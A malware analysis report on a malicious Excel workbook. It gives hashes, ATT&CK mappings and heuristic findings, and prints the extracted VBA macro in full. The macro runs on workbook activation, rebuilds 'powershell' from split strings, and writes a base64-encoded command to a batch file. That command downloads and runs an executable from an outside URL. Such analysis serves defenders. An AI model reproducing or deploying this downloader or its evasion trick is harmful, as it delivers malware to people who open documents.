Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 27d3fb91ffd771fb…

MALICIOUS

Office (OOXML)

9.8 KB Created: 2021-10-13 11:09:56 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-11-20
MD5: ab18db16e6b53aec0d1130138f247ff5 SHA-1: ee917ad4eaaee89b3ecf24753ccfe7d41c7e47c3 SHA-256: 27d3fb91ffd771fb035e4218b73be790ae5bc1dc3c78190b096b83a168a9f1fd
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that use obfuscated string concatenation to construct and execute a PowerShell command. This command is designed to download and execute a second-stage payload from the URL 'http://nhry9udg.gize.com/XX/xml/swoolsV.exe'. The use of Shell() and the reassembled 'PowerShell' keyword indicate a clear intent to execute external code.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2602 bytes
SHA-256: 885e9d5cc539b44151a48d704b164d430923f94d4f072dc7a96d432e2f876ba7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

End Sub

Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

Private Sub Workbook_Activate()
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim s As String
s = s + "start /MIN C:\Windo"
s = s + "ws\System32\" + "Wind" + "owsPo" + "werShe" + "ll\v1.0\pow" + "ersh" + "ell.exe"
s = s + " -win " + "1 -enc"
s = s + " "

s = s + "JABQAHIAbwBjAE4"
s = s + "AYQBtAGUAIAA9AC"
s = s + "AAIgBVAGsAcQB6A"
s = s + "HIAdABkAHEAcgBo"
s = s + "AHYAZABvAGMAdAB"
s = s + "sAHgALgBlAHgAZQ"
s = s + "AiADsAKABOAGUAd"
s = s + "wAtAE8AYgBqAGUA"
s = s + "YwB0ACAAUwB5AHM"
s = s + "AdABlAG0ALgBOAG"
s = s + "UAdAAuAFcAZQBiA"
s = s + "EMAbABpAGUAbgB0"
s = s + "ACkALgBEAG8AdwB"
s = s + "uAGwAbwBhAGQARg"
s = s + "BpAGwAZQAoACIAa"
s = s + "AB0AHQAcAA6AC8A"
s = s + "LwBuAGgAcgB5ADk"
s = s + "AdABnAC4AZwBpAG"
s = s + "kAegBlAC4AYwBvA"
s = s + "G0ALwBYAFgAWAAv"
s = s + "AHgAbQBsAC8AcwB"
s = s + "wAG8AbwBsAHMAdg"
s = s + "AuAGUAeABlACIAL"
s = s + "AAiACQAZQBuAHYA"
s = s + "OgBBAFAAUABEAEE"
s = s + "AVABBAFwAJABQAH"
s = s + "IAbwBjAE4AYQBtA"
s = s + "GUAIgApADsAUwB0"
s = s + "AGEAcgB0AC0AUAB"
s = s + "yAG8AYwBlAHMAcw"
s = s + "AgACgAIgAkAGUAb"
s = s + "gB2ADoAQQBQAFAA"
s = s + "RABBAFQAQQBcACQ"
s = s + "AUAByAG8AYwBOAG"
s = s + "EAbQBlACIAKQA="


ActiveWorkbook.Save
batch = "Pegpgdjacxprwtaahcsdty.bat"
Open batch For Output As #1
    Print #1, s 
    Close #1
    i = Shell(batch, 0)

End Sub

Private Sub Cellss()

End Sub

Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)

End Sub



Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes
SHA-256: 9efccbeb664c77aab997275a8c7009ca2c08b433b79f24aff8c3d718fd43b6af

Open this report in the interactive analyzer, or submit your own file for analysis.